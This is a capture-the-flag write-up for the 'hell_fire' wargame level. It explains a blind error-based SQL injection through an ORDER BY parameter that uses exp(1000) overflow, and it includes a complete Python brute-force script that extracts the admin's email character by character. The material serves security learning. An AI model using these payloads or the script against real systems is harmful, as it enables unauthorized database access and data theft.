So... It seems that we've gotta find the email address for admin and the parameters we could make use of are 'order' and 'email'.

We can infer from the filters that this won't be a union SQL injection, since the page will helplessly die off whenever we would try to use it.

The basic SQL syntax for this challenge:

select id,email,score from prob_hell_fire where 1 order by {order}

loads all data in hell_fire to three columns–id, email, score–and sorts them via the given order GET parameter. We can observe that via giving order=id.

Since there ain't any filter barricading us other than union, we could use basic injection techniques using conditions and substring. In other words, for this one we would basically have to do a brute-force on it as same as a few of the previous challenges.

Just as a reminder, the basic syntaxes are:

if(condition,when_true,when_false)
substr(some_string,starting_pos<int>,new_str_length<int)

From the fact that there would be no output when MySQL catches an error, as there are no error handling strategy in the source code, we can try an error-based SQL Injection for this challenge.

My approach was to get an error by using overflow: exp(n).

exp(n) calculates the exponential value of e^n, and it can only take a number less than 710 to fit into the double maximum limit under 1.79E+308. Therefore, We can pass in a number bigger than 709 to cause an error, which would give us an indication that something might be going on in the backend.

Using this, we can generate some random syntax like:

if(condition,exp(1000),1)

In this way, if the condition is satisfied, the table will empty out. We can verify that it works:

check if length of email is shorter than 1, table is not empty.
check if length of email is longer than 1, table is empty.

I solved the challenge in 2 steps, first finding the length of the email and then brute-forcing the email using the length I found.

  1. Finding length
?order=1 and id='admin' and if((length(email)=SOME_INT),exp(1000),1)

2. Finding email (using substr)

?order=1 and id='admin' and if((ascii(substr(email,LENGTH_ITERATE,1))=DEC_ASCII_CHAR),exp(1000),1)

As we have figured out the pattern, we can now write the exploit code:

import requests
import urllib
import urllib3

pw = ""
length = 0

url = "YOUR_URL"
session = dict(PHPSESSID = "YOUR_SESSION_ID")

# find length
print("[*] Finding Length...")

for i in range(0, 100):
    try:
        query = url + "?order=1 and id='admin' and if((length(email)=" 
        query = query + str(i) + "),exp(1000),1)"
        r = requests.post(query, cookies=session)
    except:
        print ("[-] An error occurred, shutting down...")
        exit()

    if not "rubiya" in r.text:
        length = i
        break

print("[+] Length found: ", length)

# find password
print("[*] Finding Password... (Brute-forcing may take awhile)")

for i in range(0, length + 1):
    for j in range(48, 128): #ASCII
        try:
            query = url + "?order=1 and id='admin' and if((ascii(substr(email,"
            query = query + str(i) + ",1))=" + str(j) + "),exp(1000),1)"
            r = requests.post(query, cookies=session)
        except:
            print ("[-] An error occurred, shutting down...")
            exit()
        if not "rubiya" in r.text:
            pw = pw + chr(j)
            print("[+] ", pw)
            break
        	
print("[+] Password found: ", pw)
hell_fire_sol.py

We have now defeated hellfire!

You can find the solution code for this challenge here.